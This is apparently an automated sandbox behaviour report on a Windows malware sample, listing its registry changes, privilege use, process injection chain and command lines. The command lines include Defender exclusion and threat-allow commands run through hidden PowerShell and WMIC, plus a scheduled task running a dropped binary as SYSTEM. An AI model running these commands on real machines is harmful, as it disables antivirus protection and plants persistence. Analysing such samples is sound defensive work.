Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 3652 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 1476 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 856 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 856 wrote to memory of 880 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 880 wrote to memory of 2696 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 1476 wrote to memory of 3436 N/A C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4812 wrote to memory of 1900 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1900 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3920 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4744 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 4928 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1040 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1852 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 3368 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 412 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2960 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 2016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 4812 wrote to memory of 1396 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe

"C:\Users\Admin\AppData\Local\Temp\75a6bd228d0085365dea5c30ed156b2e498bcba0e8805418a50aa724abb31b3f.exe"

C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe

.\Install.exe /hDJuIdidFXt "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bEcIFlOHxifjjBuFoU" /SC once /ST 18:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe\" 1V /Fzsite_idRtQ 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe

C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe 1V /Fzsite_idRtQ 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ 